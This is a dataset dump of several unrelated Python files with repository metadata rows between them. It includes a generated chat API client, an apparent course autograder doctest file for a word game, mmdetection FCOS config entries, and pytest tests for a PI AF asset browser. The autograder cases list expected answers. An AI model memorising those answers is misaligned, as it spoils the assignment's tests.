_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def chat_new(self, message, **kwargs): # noqa: E501
"""Send a chat message. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_new(message, async=True)
>>> result = thread.get()
:param async bool
:param str message: (required)
:param float channel_id: Channel to post to. Default 1 (English).
:return: Chat
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.chat_new_with_http_info(message, **kwargs) # noqa: E501
else:
(data) = self.chat_new_with_http_info(message, **kwargs) # noqa: E501
return data
def chat_new_with_http_info(self, message, **kwargs): # noqa: E501
"""Send a chat message. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_new_with_http_info(message, async=True)
>>> result = thread.get()
:param async bool
:param str message: (required)
:param float channel_id: Channel to post to. Default 1 (English).
:return: Chat
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['message', 'channel_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method chat_new" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'message' is set
if ('message' not in params or
params['message'] is None):
raise ValueError("Missing the required parameter `message` when calling `chat_new`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'message' in params:
form_params.append(('message', params['message'])) # noqa: E501
if 'channel_id' in params:
form_params.append(('channelID', params['channel_id'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/chat', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Chat', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 40.719715 | 1,509 | 0.611912 | 2,001 | 17,143 | 5.043978 | 0.136432 | 0.045972 | 0.022194 | 0.028535 | 0.80967 | 0.797483 | 0.79461 | 0.776281 | 0.763995 | 0.76023 | 0 | 0.015412 | 0.288456 | 17,143 | 420 | 1,510 | 40.816667 | 0.811936 | 0.053433 | 0 | 0.740909 | 0 | 0 | 0.186308 | 0.049383 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.018182 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ad2c87fac373f6365a9f40490e06109096926f29 | 4,334 | py | Python | project/wheel/tests/05.py | tingjunwong/cs88-python-data-structure | 6d0da2c1468b9a571c742a62ab0b8cf625688591 | [
"MIT"
] | null | null | null | project/wheel/tests/05.py | tingjunwong/cs88-python-data-structure | 6d0da2c1468b9a571c742a62ab0b8cf625688591 | [
"MIT"
] | null | null | null | project/wheel/tests/05.py | tingjunwong/cs88-python-data-structure | 6d0da2c1468b9a571c742a62ab0b8cf625688591 | [
"MIT"
] | null | null | null | test = {
'name': 'Problem 5',
'points': 4,
'suites': [
{
'cases': [
{
'code': r"""
>>> w = WordMunch("one two, Two. tHree")
>>> w.words()
['one', 'three', 'two']
>>> w.frequency()['o']
2
>>> key_of_max(w.frequency())
'e'
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> w = WordMunch("one two, Two. tHree")
>>> w.words()
['one', 'three', 'two']
>>> w.frequency()['o']
2
>>> key_of_max(w.frequency())
'e'
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> c0 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']))
>>> c1 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 1)
>>> c2 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 2)
>>> b0 = Board(SecretWord('three'))
>>> b1 = Board(SecretWord('three'))
>>> b2 = Board(SecretWord('three'))
>>> c0.guess(b0) # Case 1.1
'o'
>>> b0.guess(c0.guess(b0)) # Case 1.1
0
>>> c0.guess(b0) # Case 1.2
'e'
>>> b0.guess(c0.guess(b0)) # Case 1.2
2
>>> c0.guess(b0) # Case 1.3
'l'
>>> b0.guess(c0.guess(b0)) # Case 1.3
0
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> c0 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']))
>>> c1 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 1)
>>> c2 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 2)
>>> b0 = Board(SecretWord('three'))
>>> b1 = Board(SecretWord('three'))
>>> b2 = Board(SecretWord('three'))
>>> c1.guess(b1) # Case 2.1
'e'
>>> b1.guess(c1.guess(b1)) # Case 2.1
2
>>> c1.guess(b1) # Case 2.2
'l'
>>> b1.guess(c1.guess(b1)) # Case 2.2
0
>>> c1.guess(b1) # Case 2.3
'h'
>>> b1.guess(c1.guess(b1)) # Case 2.3
1
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> c0 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']))
>>> c1 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 1)
>>> c2 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 2)
>>> b0 = Board(SecretWord('three'))
>>> b1 = Board(SecretWord('three'))
>>> b2 = Board(SecretWord('three'))
>>> c0.guess(b0) # Case 1.1
'o'
>>> b0.guess(c0.guess(b0)) # Case 1.1
0
>>> c0.guess(b0) # Case 1.2
'e'
>>> b0.guess(c0.guess(b0)) # Case 1.2
2
>>> c0.guess(b0) # Case 1.3
'l'
>>> b0.guess(c0.guess(b0)) # Case 1.3
0
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> c0 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']))
>>> c1 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 1)
>>> c2 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 2)
>>> b0 = Board(SecretWord('three'))
>>> b1 = Board(SecretWord('three'))
>>> b2 = Board(SecretWord('three'))
>>> c1.guess(b1) # Case 2.1
'e'
>>> b1.guess(c1.guess(b1)) # Case 2.1
2
>>> c1.guess(b1) # Case 2.2
'l'
>>> b1.guess(c1.guess(b1)) # Case 2.2
0
>>> c1.guess(b1) # Case 2.3
'h'
>>> b1.guess(c1.guess(b1)) # Case 2.3
1
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': r"""
>>> from wordset import WordMunch
>>> from wordset import WordSet
>>> from board import Board
>>> from secret import SecretWord
>>> from utils import key_of_max
>>> from player import ComputerPlayer
""",
'teardown': '',
'type': 'doctest'
}
]
}
| 30.097222 | 76 | 0.403784 | 439 | 4,334 | 3.972665 | 0.127563 | 0.144495 | 0.178899 | 0.227064 | 0.875 | 0.875 | 0.875 | 0.875 | 0.875 | 0.875 | 0 | 0.059406 | 0.394093 | 4,334 | 143 | 77 | 30.307692 | 0.604722 | 0 | 0 | 0.678322 | 0 | 0 | 0.850946 | 0.233041 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041958 | 0 | 0.041958 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ad9b5b29e71e25d8b9345949707fc5bde0fa863d | 98 | py | Python | pytest/test_Example1.py | islam-shamiul/appium-python | 6971a97c336c8da799995a7e313bad4eae6f6eb3 | [
"MIT"
] | 1 | 2021-01-10T09:03:20.000Z | 2021-01-10T09:03:20.000Z | pytest/test_Example1.py | islam-shamiul/appium-python | 6971a97c336c8da799995a7e313bad4eae6f6eb3 | [
"MIT"
] | null | null | null | pytest/test_Example1.py | islam-shamiul/appium-python | 6971a97c336c8da799995a7e313bad4eae6f6eb3 | [
"MIT"
] | null | null | null | def test_methodA():
print("this is test A")
def test_methodB():
print("this is test B")
| 14 | 27 | 0.632653 | 16 | 98 | 3.75 | 0.5625 | 0.233333 | 0.366667 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.22449 | 98 | 6 | 28 | 16.333333 | 0.789474 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
0f41363900067e0b080b51a082755e77c5e45599 | 3,069 | py | Python | icevision/models/mmdet/models/fcos/backbones/resnet_fpn.py | ai-fast-track/mantisshrimp | cc6d6a4a048f6ddda2782b6593dcd6b083a673e4 | [
"Apache-2.0"
] | 580 | 2020-09-10T06:29:57.000Z | 2022-03-29T19:34:54.000Z | icevision/models/mmdet/models/fcos/backbones/resnet_fpn.py | ai-fast-track/mantisshrimp | cc6d6a4a048f6ddda2782b6593dcd6b083a673e4 | [
"Apache-2.0"
] | 691 | 2020-09-05T03:08:34.000Z | 2022-03-31T23:47:06.000Z | icevision/models/mmdet/models/fcos/backbones/resnet_fpn.py | lgvaz/mantisshrimp2 | 743cb7df0dae7eb1331fc2bb66fc9ca09db496cd | [
"Apache-2.0"
] | 105 | 2020-09-09T10:41:35.000Z | 2022-03-25T17:16:49.000Z | __all__ = [
"resnet50_caffe_fpn_gn_head",
"resnet50_caffe_fpn_gn_head_center_normbbox_centeronreg_giou",
"resnet50_caffe_fpn_gn_head_dcn_1x_center_normbbox_centeronreg_giou",
"resnet101_caffe_fpn_gn_head_1x_coco",
"resnet50_caffe_fpn_gn_head_mstrain_640_800_2x",
"resnet101_caffe_fpn_gn_head_mstrain_640_800_2x",
"resnext101_64x4d_fpn_gn_head_mstrain_640_800_2x",
]
from icevision.imports import *
from icevision.models.mmdet.utils import *
class MMDetFCOSBackboneConfig(MMDetBackboneConfig):
def __init__(self, **kwargs):
super().__init__(model_name="fcos", **kwargs)
base_config_path = mmdet_configs_path / "fcos"
base_weights_url = (
"https://openmmlab.oss-cn-hangzhou.aliyuncs.com/mmdetection/v2.0/fcos"
)
resnet50_caffe_fpn_gn_head = MMDetFCOSBackboneConfig(
config_path=base_config_path / "fcos_r50_caffe_fpn_gn-head_1x_coco.py",
weights_url=f"{base_weights_url}/fcos_r50_caffe_fpn_gn-head_1x_coco/fcos_r50_caffe_fpn_gn-head_1x_coco-821213aa.pth",
)
resnet50_caffe_fpn_gn_head_center_normbbox_centeronreg_giou = MMDetFCOSBackboneConfig(
config_path=base_config_path
/ "fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_1x_coco.py",
weights_url=f"{base_weights_url}/fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_1x_coco/fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_1x_coco-0a0d75a8.pth",
)
resnet50_caffe_fpn_gn_head_dcn_1x_center_normbbox_centeronreg_giou = MMDetFCOSBackboneConfig(
config_path=base_config_path
/ "fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_dcn_1x_coco.py",
weights_url=f"{base_weights_url}/fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_dcn_1x_coco/fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_dcn_1x_coco-ae4d8b3d.pth",
)
resnet101_caffe_fpn_gn_head_1x_coco = MMDetFCOSBackboneConfig(
config_path=base_config_path / "fcos_r101_caffe_fpn_gn-head_1x_coco.py",
weights_url=f"{base_weights_url}/fcos_r101_caffe_fpn_gn-head_1x_coco/fcos_r101_caffe_fpn_gn-head_1x_coco-0e37b982.pth",
)
resnet50_caffe_fpn_gn_head_mstrain_640_800_2x = MMDetFCOSBackboneConfig(
config_path=base_config_path
/ "fcos_r50_caffe_fpn_gn-head_mstrain_640-800_2x_coco.py",
weights_url=f"{base_weights_url}/fcos_r50_caffe_fpn_gn-head_mstrain_640-800_2x_coco/fcos_r50_caffe_fpn_gn-head_mstrain_640-800_2x_coco-d92ceeea.pth",
)
resnet101_caffe_fpn_gn_head_mstrain_640_800_2x = MMDetFCOSBackboneConfig(
config_path=base_config_path
/ "fcos_r101_caffe_fpn_gn-head_mstrain_640-800_2x_coco.py",
weights_url=f"{base_weights_url}/fcos_r101_caffe_fpn_gn-head_mstrain_640-800_2x_coco/fcos_r101_caffe_fpn_gn-head_mstrain_640-800_2x_coco-511424d6.pth",
)
resnext101_64x4d_fpn_gn_head_mstrain_640_800_2x = MMDetFCOSBackboneConfig(
config_path=base_config_path
/ "fcos_x101_64x4d_fpn_gn-head_mstrain_640-800_2x_coco.py",
weights_url=f"{base_weights_url}/fcos_x101_64x4d_fpn_gn-head_mstrain_640-800_2x_coco/fcos_x101_64x4d_fpn_gn-head_mstrain_640-800_2x_coco-ede514a8.pth",
)
| 47.953125 | 195 | 0.844901 | 490 | 3,069 | 4.642857 | 0.136735 | 0.076923 | 0.138462 | 0.184615 | 0.858462 | 0.839121 | 0.832527 | 0.807033 | 0.777582 | 0.681319 | 0 | 0.089982 | 0.072988 | 3,069 | 63 | 196 | 48.714286 | 0.709666 | 0 | 0 | 0.098039 | 0 | 0.058824 | 0.563376 | 0.538612 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0.039216 | 0 | 0.078431 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0f4c2e8c555f04a497e321e54db3874cd56ef34d | 51 | py | Python | tests/fixtures/py-source/filemoduleone.py | kevin2000141/dockta | e224794ea3735f7400a191b5b02ea7522d6dbf25 | [
"Apache-2.0"
] | 54 | 2019-06-24T13:00:30.000Z | 2022-02-04T14:02:48.000Z | tests/fixtures/py-source/filemoduleone.py | kevin2000141/dockta | e224794ea3735f7400a191b5b02ea7522d6dbf25 | [
"Apache-2.0"
] | 140 | 2019-06-12T08:33:08.000Z | 2022-03-07T17:21:56.000Z | tests/fixtures/py-source/filemoduleone.py | kevin2000141/dockta | e224794ea3735f7400a191b5b02ea7522d6dbf25 | [
"Apache-2.0"
] | 8 | 2019-11-24T18:53:53.000Z | 2021-03-14T23:17:22.000Z | def function_one():
return "I am function one"
| 17 | 30 | 0.686275 | 8 | 51 | 4.25 | 0.75 | 0.647059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215686 | 51 | 2 | 31 | 25.5 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
0f58e834eb8c3186c33f4cbfb6f083b46acc9c6d | 18,207 | py | Python | assets/tests/piaf/test_af_structure_browser.py | 47lining/quickstart-osisoft-pisystem2aws-connector | f6bdcb84b3cb271d3498d057474be6833f67b5be | [
"Apache-2.0"
] | null | null | null | assets/tests/piaf/test_af_structure_browser.py | 47lining/quickstart-osisoft-pisystem2aws-connector | f6bdcb84b3cb271d3498d057474be6833f67b5be | [
"Apache-2.0"
] | null | null | null | assets/tests/piaf/test_af_structure_browser.py | 47lining/quickstart-osisoft-pisystem2aws-connector | f6bdcb84b3cb271d3498d057474be6833f67b5be | [
"Apache-2.0"
] | null | null | null | from utils.piaf.af_structure_browser import AfStructureBrowser
TEST_STRUCTURE = [
{
"name": "NuGreen",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
"attributes": [
{
"name": "test"
}
],
"assets": [
{
"name": "Little Rock",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
"attributes": [
{
"name": "test"
}
],
"assets": [
{
"name": "Extruding Process",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
"description": "Current percent savings in energy use.",
"assets": [],
"attributes": [
{
"name": "test"
}
],
}
]
},
{
"name": "Second Extruding Process",
"description": "Description 2",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
"template": "Boiler",
"attributes": [
{
"name": "test"
}
],
}
]
}
]
def test_search_assets_by_name():
#given
browser = AfStructureBrowser(
assets_query="Extruding Process"
)
# when
actual = browser.search_assets(TEST_STRUCTURE)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
"name": "Extruding Process",
"description": "Current percent savings in energy use.",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
"attributes": [
{
"name": "test"
}
]
}
}
assert expected == actual
def test_search_assets_by_name_wildcards():
#given
browser = AfStructureBrowser(
assets_query="Extruding.*"
)
# when
actual = browser.search_assets(TEST_STRUCTURE)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
"name": "Extruding Process",
"description": "Current percent savings in energy use.",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
"attributes": [
{
"name": "test"
}
]
}
}
assert expected == actual
def test_search_assets_by_path():
#given
browser = AfStructureBrowser(
assets_query=".*Little Rock\\Extruding Process.*",
assets_field="path"
)
# when
actual = browser.search_assets(TEST_STRUCTURE)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
"name": "Extruding Process",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
"description": "Current percent savings in energy use.",
"attributes": [
{
"name": "test"
}
]
}
}
assert expected == actual
def test_search_assets_by_name_multiple():
#given
browser = AfStructureBrowser(
assets_query=".*Extruding Process"
)
# when
actual = browser.search_assets(TEST_STRUCTURE)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
"name": "Extruding Process",
"description": "Current percent savings in energy use.",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
"attributes": [
{
"name": "test"
}
]
},
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process": {
"name": "Second Extruding Process",
"description": "Description 2",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
"template": "Boiler",
"attributes": [
{
"name": "test"
}
]
}
}
assert expected == actual
def test_search_assets_by_description():
#given
browser = AfStructureBrowser(
assets_query="Current.*",
assets_field="description"
)
# when
actual = browser.search_assets(TEST_STRUCTURE)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
"name": "Extruding Process",
"description": "Current percent savings in energy use.",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
"attributes": [
{
"name": "test"
}
]
}
}
assert expected == actual
def test_search_assets_by_template():
#given
browser = AfStructureBrowser(
assets_query="Boiler",
assets_field="template"
)
# when
actual = browser.search_assets(TEST_STRUCTURE)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process": {
"name": "Second Extruding Process",
"description": "Description 2",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
"template": "Boiler",
"attributes": [
{
"name": "test"
}
]
}
}
assert expected == actual
def test_search_assets_by_name_all():
#given
browser = AfStructureBrowser(
assets_query=".*"
)
# when
actual = browser.search_assets(TEST_STRUCTURE)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen": {
"name": "NuGreen",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
"attributes": [
{
"name": "test"
}
]
},
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock": {
"name": "Little Rock",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
"attributes": [
{
"name": "test"
}
]
},
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
"name": "Extruding Process",
"description": "Current percent savings in energy use.",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
"attributes": [
{
"name": "test"
}
]
},
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process": {
"name": "Second Extruding Process",
"description": "Description 2",
"template": "Boiler",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
"attributes": [
{
"name": "test"
}
]
}
}
assert expected == actual
def test_search_assets_by_description_all():
#given
browser = AfStructureBrowser(
assets_query=".*",
assets_field="description"
)
# when
actual = browser.search_assets(TEST_STRUCTURE)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen": {
"name": "NuGreen",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
"attributes": [
{
"name": "test"
}
]
},
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock": {
"name": "Little Rock",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
"attributes": [
{
"name": "test"
}
]
},
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
"name": "Extruding Process",
"description": "Current percent savings in energy use.",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
"attributes": [
{
"name": "test"
}
]
},
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process": {
"name": "Second Extruding Process",
"description": "Description 2",
"template": "Boiler",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
"attributes": [
{
"name": "test"
}
]
}
}
assert expected == actual
TEST_STRUCTURE_WITH_ATTRIBUTES = [
{
"name": "NuGreen",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
"attributes": [
{
"name": "Fuel",
"description": "Fuel description"
},
{
"name": "Fuel2",
"description": "Fuel description 2"
}
],
"assets": [
{
"name": "Little Rock",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
"description": "Current ...",
"attributes": [
{
"name": "Water Savings",
"categories": [
{
"name": "Energy Savings KPI",
"description": "Relative energy use per ton of process feed."
}
],
"description": "Current percent savings in energy use.",
"value": "",
"type": "System.Double",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process\\Equipment\\B-045|Water Savings",
"point": {
"name": "SINUSOIDU_1",
"id": "10837",
"path": "\\\\EC2AMAZ-0EE3VGR\\SINUSOIDU_1"
}
}
],
"assets": [
{
"name": "Extruding Process",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
"description": "Current percent savings in energy use.",
"attributes": [
{
"name": "test savings test",
"categories": [
{
"name": "test category"
}
]
}
],
}
]
},
{
"name": "Second Extruding Process",
"description": "Description 2",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
"attributes": [
{
"name": "Fuel",
"description": "Fuel description second 2"
}
]
}
]
}
]
def test_select_attributes_by_name():
# given
browser = AfStructureBrowser(
assets_query="NuGreen",
assets_field="name",
attributes_query="Fuel"
)
# when
actual = browser.search_assets(TEST_STRUCTURE_WITH_ATTRIBUTES)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen": {
"name": "NuGreen",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
"attributes": [
{
"name": "Fuel",
"description": "Fuel description"
}
]
}
}
assert expected == actual
def test_select_attributes_by_name_wildcard():
# given
browser = AfStructureBrowser(
assets_query="Current.*",
assets_field="description",
attributes_query=".*avings.*"
)
# when
actual = browser.search_assets(TEST_STRUCTURE_WITH_ATTRIBUTES)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock": {
"name": "Little Rock",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
"description": "Current ...",
"attributes": [
{
"name": "Water Savings",
"categories": [
{
"name": "Energy Savings KPI",
"description": "Relative energy use per ton of process feed."
}
],
"description": "Current percent savings in energy use.",
"value": "",
"type": "System.Double",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process\\Equipment\\B-045|Water Savings",
"point": {
"name": "SINUSOIDU_1",
"id": "10837",
"path": "\\\\EC2AMAZ-0EE3VGR\\SINUSOIDU_1"
}
}
]
},
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
"name": "Extruding Process",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
"description": "Current percent savings in energy use.",
"attributes": [
{
"name": "test savings test",
"categories": [
{
"name": "test category"
}
]
}
]
}
}
assert expected == actual
def test_select_attributes_by_description():
# given
browser = AfStructureBrowser(
assets_query="NuGreen|Second Extruding Process",
assets_field="name",
attributes_query=".*2.*",
attributes_field="description"
)
# when
actual = browser.search_assets(TEST_STRUCTURE_WITH_ATTRIBUTES)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen": {
"name": "NuGreen",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
"attributes": [
{
"name": "Fuel2",
"description": "Fuel description 2"
}
]
},
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process": {
"name": "Second Extruding Process",
"description": "Description 2",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
"attributes": [
{
"name": "Fuel",
"description": "Fuel description second 2"
}
]
}
}
assert expected == actual
def test_select_attributes_by_category():
# given
browser = AfStructureBrowser(
assets_query="Little Rock|NuGreen",
assets_field="name",
attributes_query="Energy Savings KPI",
attributes_field="categories"
)
# when
actual = browser.search_assets(TEST_STRUCTURE_WITH_ATTRIBUTES)
# then
assert actual is not None
expected = {
"\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock": {
"name": "Little Rock",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
"description": "Current ...",
"attributes": [
{
"name": "Water Savings",
"categories": [
{
"name": "Energy Savings KPI",
"description": "Relative energy use per ton of process feed."
}
],
"description": "Current percent savings in energy use.",
"value": "",
"type": "System.Double",
"path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process\\Equipment\\B-045|Water Savings",
"point": {
"name": "SINUSOIDU_1",
"id": "10837",
"path": "\\\\EC2AMAZ-0EE3VGR\\SINUSOIDU_1"
}
}
]
}
}
assert expected == actual
def test_select_no_attributes():
# given
browser = AfStructureBrowser(
assets_query=".*",
assets_field="name",
attributes_query="no attributes with this name",
attributes_field="name"
)
# when
actual = browser.search_assets(TEST_STRUCTURE_WITH_ATTRIBUTES)
# then
assert actual is not None
expected = {}
assert expected == actual
